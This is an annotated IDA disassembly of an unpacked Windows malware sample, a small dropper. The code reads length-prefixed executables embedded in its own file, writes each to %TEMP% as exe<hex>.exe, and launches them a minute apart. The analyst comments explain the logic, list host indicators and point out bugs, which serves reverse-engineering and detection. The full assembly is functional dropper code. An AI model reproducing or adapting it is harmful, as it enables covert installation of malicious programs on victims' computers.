;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA)            |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com>            |
; | Licensed to: SRI, 1 computer, std, 05/2007                              |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA)            |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com>            |
; | Licensed to: SRI, 1 computer, std, 05/2007                              |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 67EE97424238A7A07460565D26E36BDF
; File Name : u:\work\67ee97424238a7a07460565d26e36bdf_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000250 ( 592.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00000200
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Analyst summary (derived from the code below):
;   This is a small self-extracting dropper. `start` opens and maps its own
;   image read-only, then walks the tail of the file from offset
;   dword_402004 (initially 800h) as a sequence of [u32 length][length bytes]
;   records. Each record is written to a freshly generated temp file whose
;   ".tmp" suffix is patched to ".exe" and is launched with _spawnl
;   (_P_NOWAIT); the loop sleeps 60 s between records.
;   Host-based indicators: files named <temp>\exe<hex>.exe created by this
;   process, and child processes started from that path about once a minute.
;   The only code-section imports are the kernel32/msvcrt calls listed in the
;   Externs segment; no network or registry APIs are referenced.

.686p
.mmx
.model flat

; ===========================================================================

; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

; =============== S U B R O U T I N E =======================================

; Attributes: bp-based frame

; sub_401000(arg_0 = byte offset, arg_4 = base pointer)
;   Returns (in eax) the 32-bit little-endian value stored at base+offset,
;   fetched with a 4-byte memcpy into a local. The only caller (loc_4010DE)
;   passes dword_402004 as arg_0 and lpBaseAddress as arg_4 and uses the
;   result as the length prefix of the current embedded record.
;   Stack-cleaning callee (retn 8). ebx and esi are overwritten and not
;   restored; the caller re-initialises both before its next use of them.
;   No bounds check: offset is trusted to lie inside the mapped view.
sub_401000 proc near ; CODE XREF: start+C6p

Dst = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch

    push ebp
    mov ebp, esp
    sub esp, 8
    lea eax, [ebp+Dst]
    mov ebx, [ebp+arg_0] ; offset
    mov esi, [ebp+arg_4] ; base
    lea esi, [esi+ebx] ; esi = base + offset
    push 4 ; Size (one dword)
    push esi ; Src
    push eax ; Dst
    call memcpy ; memcpy
    mov eax, [ebp+Dst] ; return the dword read
    mov esp, ebp
    pop ebp
    retn 8
sub_401000 endp

; =============== S U B R O U T I N E =======================================

; Attributes: noreturn

; start: program entry point (never returns; every path ends in ExitProcess).
;   Phase 1 (setup): locate own image -> open read-only -> size -> map read-only
;     -> query %TEMP%. Any failure jumps to the matching cleanup label.
;   Phase 2 (loop at loc_4010DE): for each [u32 length][bytes] record, write it
;     to a temp .exe and spawn it, advance the cursor, sleep 60 s.
;   Phase 3 (loc_4011BB..loc_4011DC): unmap, close handles, ExitProcess(0).
;   Return values of GetTempFileNameA, DeleteFileA, WriteFile and _spawnl are
;   never checked.
public start
start proc near
    push 81h ; nSize = 81h, matches the 81h-byte FileName buffer in _data
    push offset FileName ; lpFilename
    push eax ; hModule - eax is whatever the loader left in it; nothing here sets it
    call GetModuleFileNameA ; GetModuleFileNameA
    test eax, eax
    jz loc_4011DC ; no path -> exit
    push 0 ; hTemplateFile
    push 80h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
    push 3 ; dwCreationDisposition = OPEN_EXISTING
    push 0 ; lpSecurityAttributes
    push 1 ; dwShareMode = FILE_SHARE_READ
    push 1 ; dwDesiredAccess = FILE_READ_DATA
    push offset FileName ; lpFileName (own image)
    call CreateFileA ; CreateFileA
    cmp eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE (correct failure test for CreateFileA)
    jz loc_4011DC
    mov hFile, eax
    push 0 ; lpFileSizeHigh (high dword ignored: only sizes < 4 GiB handled)
    push hFile ; hFile
    call GetFileSize ; GetFileSize
    cmp eax, 0FFFFFFFFh ; INVALID_FILE_SIZE
    jz loc_4011D1
    mov dword_402275, eax ; file size in bytes
    push 0 ; lpName
    push 0 ; dwMaximumSizeLow
    push 0 ; dwMaximumSizeHigh
    push 2 ; flProtect = PAGE_READONLY
    push 0 ; lpFileMappingAttributes
    push hFile ; hFile
    call CreateFileMappingA ; CreateFileMappingA
    test eax, eax
    jz loc_4011D1
    mov hFileMappingObject, eax
    push 0 ; dwNumberOfBytesToMap (0 = whole file)
    push 0 ; dwFileOffsetLow
    push 0 ; dwFileOffsetHigh
    push 4 ; dwDesiredAccess = FILE_MAP_READ
    push hFileMappingObject ; hFileMappingObject
    call MapViewOfFile ; MapViewOfFile
    test eax, eax
    jz loc_4011C6
    mov lpBaseAddress, eax ; read-only view of own image
    push offset PathName ; lpBuffer
    push 104h ; nBufferLength = MAX_PATH
    call GetTempPathA ; GetTempPathA
    test eax, eax
    jz loc_4011C6 ; note: view is never unmapped on this path (process exits anyway)
    sub dword_402275, 4 ; loop bound = size - 4, i.e. while a full length prefix remains

; Record loop. Cursor dword_402004 starts at 800h (see _data) and is advanced
; by length+4 per iteration. The length is read straight from the file with no
; check against the mapped size, so a truncated or tampered container would
; make WriteFile read beyond the view.
loc_4010DE: ; CODE XREF: start+192j
    push lpBaseAddress ; -> arg_4
    push dword_402004 ; -> arg_0
    call sub_401000 ; eax = *(u32 *)(base + cursor)
    mov nNumberOfBytesToWrite, eax ; record length
    push offset String ; lpTempFileName
    push 0 ; uUnique (0: the file is created)
    push offset PrefixString ; "exe"
    push offset PathName ; lpPathName (%TEMP%)
    call GetTempFileNameA ; GetTempFileNameA
    push offset String ; lpFileName
    call DeleteFileA ; DeleteFileA - drop the placeholder .tmp just created
    push offset String ; lpString
    call lstrlenA ; lstrlenA
    mov esi, offset String
    lea esi, [esi+eax] ; esi -> terminating NUL
    mov dword ptr [esi-4], 6578652Eh ; 6578652Eh = '.exe' little-endian: overwrite the trailing '.tmp'
    push 0 ; hTemplateFile
    push 80h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
    push 2 ; dwCreationDisposition = CREATE_ALWAYS
    push 0 ; lpSecurityAttributes
    push 2 ; dwShareMode = FILE_SHARE_WRITE
    push 2 ; dwDesiredAccess = FILE_WRITE_DATA
    push offset String ; lpFileName (<temp>\exe<hex>.exe)
    call CreateFileA ; CreateFileA
    test eax, eax ; tests for 0, but CreateFileA signals failure with
                  ; INVALID_HANDLE_VALUE (-1) as the call at start+34 expects;
                  ; a failed create therefore falls through and WriteFile /
                  ; CloseHandle below receive -1
    jz short loc_40118B
    mov hObject, eax
    mov esi, lpBaseAddress
    add esi, dword_402004
    add esi, 4 ; esi -> record payload (just past the length prefix)
    push 0 ; lpOverlapped
    push offset NumberOfBytesWritten ; lpNumberOfBytesWritten
    push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
    push esi ; lpBuffer
    push eax ; hFile
    call WriteFile ; WriteFile (result unchecked)
    push hObject ; hObject
    call CloseHandle ; CloseHandle
    ; _spawnl(1, String, NULL) -> mode 1 = _P_NOWAIT: launch the dropped file
    ; and continue. _spawnl is cdecl but the 12 bytes of arguments are never
    ; popped, which is why IDA reports "sp-analysis failed" on endp; the stack
    ; drifts by 12 bytes per record.
    push 0
    push offset String
    push 1
    call _spawnl ; _spawnl

loc_40118B: ; CODE XREF: start+124j
    mov ebx, nNumberOfBytesToWrite
    add dword_402004, ebx
    add dword_402004, 4 ; cursor += length + sizeof(u32)
    mov ecx, dword_402275
    cmp dword_402004, ecx ; signed compare against size-4
    jge short loc_4011BB ; no more records
    push 0EA60h ; dwMilliseconds = 60000 (60 s between drops)
    call Sleep ; Sleep
    jmp loc_4010DE
; ---------------------------------------------------------------------------

; Cleanup chain: each label releases one resource and falls into the next.
loc_4011BB: ; CODE XREF: start+186j
    push lpBaseAddress ; lpBaseAddress
    call UnmapViewOfFile ; UnmapViewOfFile

loc_4011C6: ; CODE XREF: start+91j start+ADj
    push hFileMappingObject ; hObject
    call CloseHandle ; CloseHandle

loc_4011D1: ; CODE XREF: start+4Fj start+71j
    push hFile ; hObject
    call CloseHandle ; CloseHandle

loc_4011DC: ; CODE XREF: start+12j start+34j
    push 0 ; uExitCode
    call ExitProcess ; ExitProcess
start endp ; sp-analysis failed

; ---------------------------------------------------------------------------
align 10h

; The following are 6-byte import thunks (jmp [__imp_*]) that IDA collapsed.
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileSize. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileMappingA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION MapViewOfFile. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetTempPathA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetTempFileNameA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION DeleteFileA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION lstrlenA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION WriteFile. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle.
; PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION UnmapViewOfFile. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _spawnl. PRESS KEYPAD "+" TO EXPAND]
align 200h
_text ends

; Section 2. (virtual address 00002000)
; Virtual size : 000004A0 ( 1184.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00000600
; Flags C0000040: Data Readable Writable
; Alignment : default

; ===========================================================================

; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 402000h
; char PrefixString[]
; Three-character prefix handed to GetTempFileNameA; dropped files are named
; <temp>\exe<hex>.exe after start patches the ".tmp" suffix.
PrefixString db 'exe',0 ; DATA XREF: start+D7o
; Read cursor into the mapped image: file offset of the first embedded record
; (800h), advanced by length+4 per record in start. Stored in the writable data
; section, so the loop state is visible in memory dumps.
dword_402004 dd 800h ; DATA XREF: start+C0r start+131r ...
align 10h
; The dword tables below look like the PE import directory laid out inline:
; IMAGE_IMPORT_DESCRIPTOR entries (thunk RVA, 0, 0, name RVA, IAT RVA) followed
; by the thunk arrays of hint/name RVAs into the second _data segment below.
; RVAs are relative to Imagebase 400000 - verify against the PE headers.
dd 204Ch, 2 dup(0)
dd 21B4h, 2094h, 2088h, 2 dup(0)
dd 21D6h, 20D0h, 5 dup(0)
dd 20DCh, 20F2h, 2100h, 210Eh, 2124h, 2134h, 2144h, 2158h
dd 2166h, 2172h, 217Eh, 218Ch, 2194h, 21A6h, 0
dd 21C2h, 21CCh, 0
_data ends

;
; Imports from kernel32.dll
;

; ===========================================================================

; Segment type: Externs
; _idata
; Complete import set of the sample: file/mapping/temp-file APIs from kernel32
; plus memcpy/_spawnl from msvcrt. Nothing else is imported.
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn __imp_GetModuleFileNameA:dword ; DATA XREF: GetModuleFileNameAr
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn __imp_CreateFileA:dword ; DATA XREF: CreateFileAr
; DWORD __stdcall GetFileSize(HANDLE hFile,LPDWORD lpFileSizeHigh)
extrn __imp_GetFileSize:dword ; DATA XREF: GetFileSizer
; HANDLE __stdcall CreateFileMappingA(HANDLE hFile,LPSECURITY_ATTRIBUTES lpFileMappingAttributes,DWORD flProtect,DWORD dwMaximumSizeHigh,DWORD dwMaximumSizeLow,LPCSTR lpName)
extrn __imp_CreateFileMappingA:dword ; DATA XREF: CreateFileMappingAr
; LPVOID __stdcall MapViewOfFile(HANDLE hFileMappingObject,DWORD dwDesiredAccess,DWORD dwFileOffsetHigh,DWORD dwFileOffsetLow,SIZE_T dwNumberOfBytesToMap)
extrn __imp_MapViewOfFile:dword ; DATA XREF: MapViewOfFiler
; DWORD __stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer)
extrn __imp_GetTempPathA:dword ; DATA XREF: GetTempPathAr
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName,LPCSTR lpPrefixString,UINT uUnique,LPSTR lpTempFileName)
extrn __imp_GetTempFileNameA:dword ; DATA XREF: GetTempFileNameAr
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn __imp_DeleteFileA:dword ; DATA XREF: DeleteFileAr
; int __stdcall lstrlenA(LPCSTR lpString)
extrn __imp_lstrlenA:dword ; DATA XREF: lstrlenAr
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn __imp_WriteFile:dword ; DATA XREF: WriteFiler
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn __imp_CloseHandle:dword ; DATA XREF: CloseHandler
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn __imp_Sleep:dword ; DATA XREF: Sleepr
; BOOL __stdcall UnmapViewOfFile(LPCVOID lpBaseAddress)
extrn __imp_UnmapViewOfFile:dword ; DATA XREF: UnmapViewOfFiler
; void __stdcall ExitProcess(UINT uExitCode)
extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcessr

;
; Imports from msvcrt.dll
;

; void *__cdecl memcpy(void *Dst,const void *Src,size_t Size)
extrn __imp_memcpy:dword ; DATA XREF: memcpyr
; _spawnl: cdecl, variadic (mode, path, arg0, ..., NULL); no prototype recovered by IDA.
extrn __imp__spawnl:dword ; DATA XREF: _spawnlr

; ===========================================================================

; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 4020DCh
; Import hint/name table. IDA rendered most entries as raw dwords; decoding the
; little-endian bytes gives the 2-byte hint followed by the ASCII name:
; "GetModuleFileNameA"
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatefilea db 'CreateFileA',0
; "GetFileSize", "CreateFileMappingA", "MapViewOfFile", "GetTempPathA",
; "GetTempFileNameA", "DeleteFileA", "lstrlenA"
dd 65470000h, 6C694674h, 7A695365h, 65h, 61657243h, 69466574h
dd 614D656Ch, 6E697070h, 4167h, 614D0000h, 65695670h, 46664F77h
dd 656C69h, 65470000h, 6D655474h, 74615070h, 4168h, 65470000h
dd 6D655474h, 6C694670h, 6D614E65h, 4165h, 65440000h, 6574656Ch
dd 656C6946h, 41h, 7274736Ch, 416E656Ch, 0
aWritefile db 'WriteFile',0
align 10h
aClosehandle db 'CloseHandle',0
; "Sleep", "UnmapViewOfFile", "ExitProcess", then the DLL name "kernel32.dll"
dd 6C530000h, 706565h, 6E550000h, 5670616Dh, 4F776569h
dd 6C694666h, 65h, 74697845h, 636F7250h, 737365h, 6E72656Bh
dd 32336C65h, 6C6C642Eh, 0
aMemcpy db 'memcpy',0
align 4
; "_spawnl", then the DLL name "msvcrt.dll"
dd 735F0000h, 6E776170h, 736D006Ch, 74726376h, 6C6C642Eh
dd 4 dup(0)
; char FileName[]
; Own module path from GetModuleFileNameA. Total size 10h + 1Ch*4 + 1 = 81h
; bytes, which is exactly the nSize passed at start+0.
FileName db 10h dup(0) ; DATA XREF: start+5o start+27o
dd 1Ch dup(?)
db ?
; HANDLE hFile
; Read-only handle to the sample's own image.
hFile dd ? ; DATA XREF: start+3Aw start+41r ...
; File size from GetFileSize, reduced by 4 in start; the record loop runs while
; dword_402004 < this value.
dword_402275 dd ? ; DATA XREF: start+55w start+B3w ...
; HANDLE hFileMappingObject
hFileMappingObject dd ? ; DATA XREF: start+77w start+84r ...
; LPCVOID lpBaseAddress
; Base of the read-only view of the image; all record reads are relative to it.
lpBaseAddress dd ? ; DATA XREF: start+97w
; start:loc_4010DEr ...
; DWORD nNumberOfBytesToWrite
; Length prefix of the current record (taken from the file, unvalidated).
nNumberOfBytesToWrite dd ? ; DATA XREF: start+CBw start+141r ...
; HANDLE hObject
; Write handle to the current dropped .exe.
hObject dd ? ; DATA XREF: start+126w start+14Er
; char String[]
; Full path of the current dropped file (105h bytes = MAX_PATH + 5).
String db 105h dup(?) ; DATA XREF: start+D0o start+E6o ...
; char PathName[]
; %TEMP% directory from GetTempPathA (nBufferLength 104h).
PathName db 105h dup(?) ; DATA XREF: start+9Co start+DCo
; DWORD NumberOfBytesWritten
; Filled by WriteFile but never read back.
NumberOfBytesWritten dd ? ; DATA XREF: start+13Co
align 10h
_data ends

end start